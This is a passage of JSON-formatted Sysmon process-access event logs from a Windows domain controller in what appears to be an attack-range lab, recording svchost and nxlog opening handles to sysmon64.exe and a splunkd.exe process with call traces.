596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
